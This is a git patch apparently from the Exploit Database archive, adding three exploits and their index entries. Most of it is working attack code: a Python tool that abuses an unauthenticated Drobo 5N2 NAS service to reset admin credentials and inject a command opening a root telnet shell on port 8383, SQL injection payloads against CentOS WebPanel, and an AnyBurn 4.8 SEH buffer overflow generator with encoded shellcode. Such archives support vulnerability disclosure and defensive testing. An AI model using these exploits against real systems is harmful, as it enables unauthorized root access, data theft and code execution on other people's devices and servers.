From 79fee2e601c118348ca3bca836d1166e8ea9636d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 14 Mar 2020 05:01:46 +0000 Subject: [PATCH] DB: 2020-03-14 4 changes to exploits/shellcodes AnyBurn 4.8 - Buffer Overflow (SEH) Drobo 5N2 4.1.1 - Remote Command Injection Centos WebPanel 7 - 'term' SQL Injection --- exploits/hardware/remote/48214.py | 247 ++++++++++++++++++++++++++++++ exploits/linux/webapps/48212.txt | 28 ++++ exploits/windows/local/40863.txt | 1 + exploits/windows/local/48211.py | 125 +++++++++++++++ files_exploits.csv | 3 + 5 files changed, 404 insertions(+) create mode 100755 exploits/hardware/remote/48214.py create mode 100644 exploits/linux/webapps/48212.txt create mode 100755 exploits/windows/local/48211.py diff --git a/exploits/hardware/remote/48214.py b/exploits/hardware/remote/48214.py new file mode 100755 index 000000000..902e90630 --- /dev/null +++ b/exploits/hardware/remote/48214.py @@ -0,0 +1,247 @@ +# Exploit Title: Drobo 5N2 4.1.1 - Remote Command Injection +# Date: 2020-03-12 +# Exploit Author: Rick Ramgattie, Ian Sindermann +# Vendor Homepage: https://www.drobo.com/ +# Version: 4.1.1 and lower. +# CVE: CVE-2018-14709, CVE-2018-14701 +### + +#!/usr/bin/env python3 + +# nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service. +# This utility leverages the lack of any real authentication mechanism to perform arbitrary actions. +# These actions include: +# - Getting device status. +# - Installing applications. +# - Resetting admin credentials. +# - Popping root shells. +# - Turning on party mode. +# This set of exploits is known to affect the Drobo 5N2, firmware version 4.1.1 and lower. +# As of 2020-03-12, newer firmware versions appear to be vulnerable as well, but this has not been verified. +# Most of the Drobo product line also appears to be vulnerable. Again, this has not been verified. +# These vulnerabilities were disclosed to the manufacturer on 2018-07-10. +# More vulnerabilities for this device may be found here: https://blog.securityevaluators.com/4f1d885df7fc +### +# Product of ISE Labs. +# - http://www.securityevaluators.com/ +# - @ISESecurity +### + + +# RE Notes: +# ,-- Encryption bool? +# Handshake Preamble: * /\ +# 44 52 49 4e 45 54 54 4d 07 01 00 00 00 00 00 88 +# \_____________________/ \_________/ \_________/ +# Static string. To/from Size of +# "DIRNETTM" server? next message +# +# Handshake +# 64 72 61 31 37 33 32 30 32 33 30 30 30 31 30 00 00 00 00 00 64 72 61 31 37 33 32 30 32 33 30 30 30 31 30 00 00 00 00 00 00 00... +# \______________________________________________/ \_________/ \_______________________________________________/ \_________________--> +# Device serial number with NULL padding. NULL Device serial number with NULL padding. ESAID? 88 bytes of NULL +# "dra173202300010" "dra173202300010" +# +# The stat port returns an "ESAID" value that is identical to the serial number on this device (5N2). +# One of the serial numbers in this packet may actually be the ESAID. +# +# Preamble: * +# 44 52 49 4e 45 54 54 4d 0a 01 00 00 00 00 00 88 +# \_____________________/ \_________/ \_________/ +# Static string. To/from Size of +# "DIRNETTM" server? next message +# +# Message: +# XX XX XX XX XX XX XX XX 00 +# \_____________________/ \/ +# Arbitrary length string NULL terminator +# +# +# Protocol flow: +# Initial handshake: ,----- 2nd nibble in 3rd section is different. "07 01 00 00" instead of "0a 01 00 00" #TODO: why? +# | c -> s: Preamble. <-' \_ +# | c -> s: Message: Handshake / `- These two are normally sent as one packet. +# v c <- s: Preamble. <-------- 2nd nibble in 3rd section is different. "87 01 00 00" instead of "8a 01 00 00" #TODO: why? +# Loop: +# +> c -> s: Preamble. +# | c -> s: Message: Command. +# | c <- s: Preamble. +# +- c <- s: Message: Results. > Large responses are split into chunks. Must use size from preamble. + + +import argparse +import logging +import re +import socket +import struct +import sys + + +LOG_FORMAT = '[%(levelname)s]: %(message)s' +BUFFER_SIZE = 1024 +HANDSHAKE_PREAMBLE = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x07\x01\x00\x00' +PREAMBLE = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x0a\x01\x00\x00' +PREAMBLE_LEN = 16 + +# Note: Payloads usually contain the device's serial number. Replace this with +# '{serial}' so `send_msg` can insert the target's serial. +PAYLOADS = { + "daccess" :'78DroboAccessInstallftp://updates.drobo.com/droboapps/2.1/downloads/DroboAccess.tgz{serial}', + "dropbear":'78dropbearInstallftp://updates.drobo.com/droboapps/2.1/downloads/dropbear.tgz{serial}', + "getadmin":'30DRINasAdminConfigDRINasDroboAppsConfig{serial}', + "getnet" :'30{serial}Network', + "gettemp" :'61{serial}', + "partyon" :'26900{serial}', + "partyoff":'260{serial}', + "popit" :'78Drobo`telnetd -l $SHELL -p 8383`AccessInstallbork{serial}', + "restart" :'21{serial}', + "setadmin":'31adminono10111{serial}', + "test" :'824294966876{serial}', + "stdin" :'Handled elsewhere.'} + +DEFAULT_PORT_STAT = 5000 +DEFAULT_PORT_CMD = 5001 +DEFAULT_TIMEOUT = None +HELP_EPILOG=''' +PAYLOADS + daccess - Installs DroboAccess on the target device. At the time of writing, + DroboAccess has numerous unauthenticated command injection + vulnerabilities. Try the following: + GET /DroboAccess/delete_user?username=test';/usr/sbin/telnetd -l /bin/sh -p 8383 + - A long delay and response of "0" is expected. + dropbear - Installs dropbear on the target device. + - A response of "0" is expected. + getadmin - Returns the target's current (redacted) admin configuration. + gettemp - Returns the target's system info (temperature and uptime). + getnet - Returns the target's network info. + partyon - Enables "party mode" on the target. This will cause the target + device's lights to blink for 15 minutes. + partyoff - Prematurely disables "party mode". + popit - Exploits CVE-2019-6801 to spawn a root bind shell on port 8383. + - A response of "1" is expected. + restart - Restarts the target device. + setadmin - Sets administrative options on the target. + - Username: admin + - Password: ono + - Apps enabled: yes + stdin - Reads data from STDIN and sends it as a command. +''' + + +def recv_message(s): + preamble = s.recv(PREAMBLE_LEN) + msg_len = struct.unpack(">I", preamble[-4:])[0] # Parse expected message length from preamble. + message = '' + if msg_len <= 0: + return(message) + while True: + message += s.recv(BUFFER_SIZE).decode('utf-8') + if len(message) >= msg_len: + return(message) # There will be a null at the end. It should be fine. + + +def send_handshake(s, serial): + serial_bytes = serial.encode('utf-8') + hs_body = struct.pack("16s", serial_bytes) # 16 byte padded string containing device serial number. + hs_body += struct.pack(">I", 0) # 4 byte field, presumably uint, only seen as zero. + hs_body += struct.pack("16s", serial_bytes) # 16 byte padded string containing device serial number. again... + hs_body += struct.pack("184x") # 184 bytes of NULL padding. + size_bytes = struct.pack(">I", len(hs_body)) # Size of message body. Send with preamble. + hs_data = HANDSHAKE_PREAMBLE + size_bytes + hs_body + logging.debug(repr(hs_data)) + s.send(hs_data) + + +def send_message(s, serial, message): + msg_body = message.format(serial=serial) # Add target device's serial number. + msg_body_bytes = msg_body.encode('utf-8') + msg_body_bytes += struct.pack("x") # NULL terminator. + size_bytes = struct.pack(">I", len(msg_body_bytes)) # Size of XML body. Send with preamble. + msg_data = PREAMBLE + size_bytes + msg_body_bytes + logging.debug(repr(msg_data)) + s.send(msg_data) + + +aparser = argparse.ArgumentParser( + description='nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service.', + epilog=HELP_EPILOG, + formatter_class=argparse.RawDescriptionHelpFormatter) +aparser.add_argument("host", help='Host or IP address of the target Drobo.') +aparser.add_argument("payload", help='Payload to use. See PAYLOADS.') +aparser.add_argument("-p", "--portstat", help='Specify a non-default stat port on the Drobo.', default=DEFAULT_PORT_STAT, type=int) +aparser.add_argument("-P", "--portcmd", help='Specify a non-default command port on the Drobo.', default=DEFAULT_PORT_CMD, type=int) +aparser.add_argument("-s", "--serial", help='Manually set the target serial number. Skips serial number detection.') +aparser.add_argument("-t", "--timeout", help='Set a timeout in seconds for socket operations.', default=DEFAULT_TIMEOUT, type=float) +aparser.add_argument("-v", "--verbose", help='Increase verbosity.', action='store_true') +args = aparser.parse_args() + +# Basic check for color support. +if sys.stdout.isatty() and sys.platform in ["linux","linux2","darwin"]: + logging.addLevelName(logging.NOTSET, "\033[39m????\033[0m") + logging.addLevelName(logging.DEBUG, "\033[37mDBUG\033[0m") + logging.addLevelName(logging.INFO, "\033[96mINFO\033[0m") + logging.addLevelName(logging.WARNING, "\033[93mWARN\033[0m") + logging.addLevelName(logging.ERROR, "\033[95mERRR\033[0m") + logging.addLevelName(logging.CRITICAL, "\033[91mCRIT\033[0m") +else: + logging.addLevelName(logging.NOTSET, "????") + logging.addLevelName(logging.DEBUG, "DBUG") + logging.addLevelName(logging.INFO, "INFO") + logging.addLevelName(logging.WARNING, "WARN") + logging.addLevelName(logging.ERROR, "ERRR") + logging.addLevelName(logging.CRITICAL, "CRIT") + +if args.verbose: + logging.basicConfig(format=LOG_FORMAT, level=logging.DEBUG) +else: + logging.basicConfig(format=LOG_FORMAT, level=logging.INFO) + +if args.payload == 'stdin': + logging.info("Reading payload from STDIN.") + payload_xml = sys.stdin.read() + logging.debug(payload_xml) +else: + payload_xml = PAYLOADS[args.payload] + + +logging.info("Connecting...") +# Connect to the stat port. This is required for the cmd port to work. +# The stat port also gives us the serial number. +sock_stat = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock_stat.settimeout(args.timeout) +sock_stat.connect((args.host, args.portstat)) +# Connect to the cmd port. +sock_cmd = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock_cmd.settimeout(args.timeout) +sock_cmd.connect((args.host, args.portcmd)) + +# Pull the serial number from the stat port. +logging.info("Pulling serial number...") +stat_msg = sock_stat.recv(BUFFER_SIZE) +if args.serial: + serial = args.serial +else: + m = re.search('([^<]+)', stat_msg.decode('utf-8')) + if not m: + logging.critical("Could not determine target's serial number!") + logging.debug(stat_msg) + sys.exit(100) + serial = m.group(1) + logging.info("Identified serial: " + serial) + +# Perform a handshake with the cmd port. Requires the serial num. +logging.info('Performing handshake...') +send_handshake(sock_cmd, serial) +recv_message(sock_cmd) # Blank response - trash. + +# Send the payload. +logging.info("Sending payload...") +send_message(sock_cmd, serial, payload_xml) +logging.info("Waiting for response...") +resp = recv_message(sock_cmd) +logging.info("Response:\n" + resp) + +# Cleanup. +sock_cmd.close() +sock_stat.close() +logging.info("Donezo.") \ No newline at end of file diff --git a/exploits/linux/webapps/48212.txt b/exploits/linux/webapps/48212.txt new file mode 100644 index 000000000..651e5c44d --- /dev/null +++ b/exploits/linux/webapps/48212.txt @@ -0,0 +1,28 @@ +# Exploit Title: Centos WebPanel 7 - 'term' SQL Injection +# Google Dork: N/A +# Date: 2020-03-03 +# Exploit Author: Berke YILMAZ +# Vendor Homepage: http://centos-webpanel.com/ +# Software Link: http://centos-webpanel.com/ +# Version: v6 - v7 +# Tested on: Kali Linux - Windows 10 +# CVE : N/A + +# Type: Error Based SQL Injection +# Payload: +https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a' +AND (SELECT 1197 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT +(ELT(1197=1197,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aRuO + + +# Type: Time Based SQL Injection +# Payload: +https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a' +OR SLEEP(5)-- JCpP + +Centos-Webpanel (http://centos-webpanel.com/) +CentOS Web Panel | Free Linux Web Hosting Control Panel +Free CentOS Linux Web Hosting control panel designed for quick and easy +management of (Dedicated & VPS) servers without of need to use ssh console +for every little thing \ No newline at end of file diff --git a/exploits/windows/local/40863.txt b/exploits/windows/local/40863.txt index 83b87cbe9..7f122f310 100644 --- a/exploits/windows/local/40863.txt +++ b/exploits/windows/local/40863.txt @@ -6,6 +6,7 @@ [+] ISR: ApparitionSec +[+] CVE: CVE-2019-0948 Vendor: diff --git a/exploits/windows/local/48211.py b/exploits/windows/local/48211.py new file mode 100755 index 000000000..a79f3e927 --- /dev/null +++ b/exploits/windows/local/48211.py @@ -0,0 +1,125 @@ +# Exploit Title: AnyBurn 4.8 - Buffer Overflow (SEH) +# Date: 2020-03-09 +# Vendor Homepage: http://www.anyburn.com/ +# Software Link : http://www.anyburn.com/anyburn_setup.exe +# Exploit Authors: "Richard Davy/Gary Nield" +# Tested Version: 4.8 (32-bit) +# Tested on: Windows 10 Enterprise x64 +# Vulnerability Type: Buffer Overflow/SEH/Unicode + +# Steps to Produce the Exploit: +# 1.- Run python code +# 2.- Open payload.txt and copy content to clipboard +# 3.- Open AnyBurn choose 'Copy disk to image file' +# 4.- Paste the content of payload.txt into the field: 'Select image file name' +# 5.- Click 'Create Now' and you will see a crash and the payload launch. + +#!/usr/bin/env python + +#Set overall payload size +crash_buffer_size = 10000 +#nseh offset for SEH overwrite +nseh_offset = 9197 + +#location in payload where stack alignment returns to for payload +payloadret = 4459 +#payload filler +junk = "\x71" * payloadret + +#Payload generated via msfvenom, easily changeable as padding is auto calculated +#msfvenom -a x86 -p windows/exec cmd=calc.exe -e x86/unicode_upper BufferRegister=EAX -f py +buf = b"" +buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51" +buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44" +buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41" +buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50" +buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31" +buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50" +buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49" +buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51" +buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42" +buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b" +buf += b"\x4c\x5a\x48\x44\x42\x4d\x30\x4b\x50\x4b\x50\x43\x30" +buf += b"\x44\x49\x49\x55\x50\x31\x49\x30\x43\x34\x54\x4b\x50" +buf += b"\x50\x50\x30\x44\x4b\x42\x32\x4c\x4c\x54\x4b\x42\x32" +buf += b"\x4c\x54\x34\x4b\x43\x42\x4d\x58\x4c\x4f\x46\x57\x4f" +buf += b"\x5a\x4d\x56\x30\x31\x4b\x4f\x56\x4c\x4f\x4c\x33\x31" +buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x49\x31\x48\x4f\x4c" +buf += b"\x4d\x4d\x31\x49\x37\x5a\x42\x4c\x32\x50\x52\x50\x57" +buf += b"\x44\x4b\x30\x52\x4c\x50\x34\x4b\x50\x4a\x4f\x4c\x54" +buf += b"\x4b\x50\x4c\x4c\x51\x54\x38\x5a\x43\x31\x38\x4b\x51" +buf += b"\x48\x51\x32\x31\x44\x4b\x42\x39\x4d\x50\x4b\x51\x59" +buf += b"\x43\x54\x4b\x51\x39\x4d\x48\x4b\x33\x4f\x4a\x4f\x59" +buf += b"\x44\x4b\x30\x34\x44\x4b\x4d\x31\x5a\x36\x30\x31\x4b" +buf += b"\x4f\x56\x4c\x57\x51\x58\x4f\x4c\x4d\x4b\x51\x39\x37" +buf += b"\x4f\x48\x39\x50\x34\x35\x4b\x46\x4d\x33\x33\x4d\x4b" +buf += b"\x48\x4f\x4b\x33\x4d\x4f\x34\x43\x45\x4b\x34\x42\x38" +buf += b"\x44\x4b\x51\x48\x4e\x44\x4b\x51\x59\x43\x31\x56\x54" +buf += b"\x4b\x4c\x4c\x30\x4b\x44\x4b\x50\x58\x4d\x4c\x4d\x31" +buf += b"\x38\x53\x34\x4b\x4b\x54\x44\x4b\x4d\x31\x5a\x30\x53" +buf += b"\x59\x51\x34\x4e\x44\x4d\x54\x51\x4b\x31\x4b\x43\x31" +buf += b"\x52\x39\x51\x4a\x30\x51\x4b\x4f\x49\x50\x51\x4f\x51" +buf += b"\x4f\x30\x5a\x34\x4b\x4c\x52\x4a\x4b\x34\x4d\x51\x4d" +buf += b"\x31\x5a\x4b\x51\x34\x4d\x35\x35\x46\x52\x4b\x50\x4d" +buf += b"\x30\x4b\x50\x30\x50\x51\x58\x4e\x51\x44\x4b\x42\x4f" +buf += b"\x33\x57\x4b\x4f\x59\x45\x47\x4b\x5a\x50\x38\x35\x36" +buf += b"\x42\x32\x36\x52\x48\x37\x36\x45\x45\x47\x4d\x45\x4d" +buf += b"\x4b\x4f\x48\x55\x4f\x4c\x4d\x36\x53\x4c\x4c\x4a\x35" +buf += b"\x30\x4b\x4b\x39\x50\x42\x55\x4c\x45\x57\x4b\x4f\x57" +buf += b"\x4d\x43\x52\x52\x32\x4f\x42\x4a\x4d\x30\x42\x33\x4b" +buf += b"\x4f\x4a\x35\x32\x43\x51\x51\x42\x4c\x52\x43\x4e\x4e" +buf += b"\x53\x35\x42\x58\x52\x45\x4d\x30\x41\x41" + +#Filler padding after payload code to bring us to nseh offset +#auto calculated in case payload size changes +junk1 = "\x71" * int(nseh_offset-(len(junk)+len(buf))) + +#SEH Overwrite +nSeh = "\x61\x70" +#Unicode safe SEH return +seh = "\x09\x48" + +#Stack realignment which takes us directly back into shellcode +eax_align = "\x70\x71\x71\x71" +eax_align += "\x54" +eax_align += "\x47" +eax_align += "\x58" +eax_align += "\x47" +eax_align += "\x05\x2F\x11" +eax_align += "\x47" +eax_align += "\x2d\x01\x11" +eax_align += "\x47" +eax_align += "\x50" +eax_align += "\x47" +eax_align += "\xc3" + +#Padding to take us to 10,000 +padding = "\x71" * int(crash_buffer_size-(len(junk)+len(buf)+len(junk1)+len(nSeh)+len(seh)+len(eax_align))) + +#Assembly of parts +buffer=junk+buf+junk1+nSeh+seh+eax_align+padding + +try: + f=open("payload.txt","w") + print "\nAnyBurn Version 4.8 (32-bit) Exploit\n" + print "Software Link : http://www.anyburn.com/anyburn_setup.exe" + print "Exploit Authors: Richard Davy/Gary Nield" + print "Tested on: Windows 10 Enterprise x64" + print "Vulnerability Type: Buffer Overflow/SEH/Unicode\n" + + print "Steps to Produce the Exploit:" + print "1.- Run python code" + print "2.- Open payload.txt and copy content to clipboard" + print "3.- Open AnyBurn choose 'Copy disk to image file'" + print "4.- Paste the content of payload.txt into the field: 'Select image file name'" + print "5.- Click 'Create Now' and you will see a crash and the payload launch.\n" + + print "[+] Creating %s bytes evil payload " %len(buffer) + + f.write(buffer) + f.close() + + print "[+] File payload.txt created..." + +except: + print "[!] File cannot be created..." \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2a3d45dac..7ebee40b7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10989,6 +10989,7 @@ id,file,description,date,author,type,platform,port 48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple, 48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows, 48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows, +48211,exploits/windows/local/48211.py,"AnyBurn 4.8 - Buffer Overflow (SEH)",2020-03-13,"Richard Davy",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -18041,6 +18042,7 @@ id,file,description,date,author,type,platform,port 48186,exploits/multiple/remote/48186.rb,"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple, 48191,exploits/linux/remote/48191.rb,"Nagios XI - Authenticated Remote Command Execution (Metasploit)",2020-03-10,Metasploit,remote,linux, 48192,exploits/php/remote/48192.rb,"PHPStudy - Backdoor Remote Code execution (Metasploit)",2020-03-10,Metasploit,remote,php, +48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -42466,3 +42468,4 @@ id,file,description,date,author,type,platform,port 48208,exploits/php/webapps/48208.py,"rConfig 3.9 - 'searchColumn' SQL Injection",2020-03-12,vikingfr,webapps,php, 48209,exploits/php/webapps/48209.py,"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion",2020-03-11,"Andrea Cardaci",webapps,php, 48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php, +48212,exploits/linux/webapps/48212.txt,"Centos WebPanel 7 - 'term' SQL Injection",2020-03-13,"Berke YILMAZ",webapps,linux,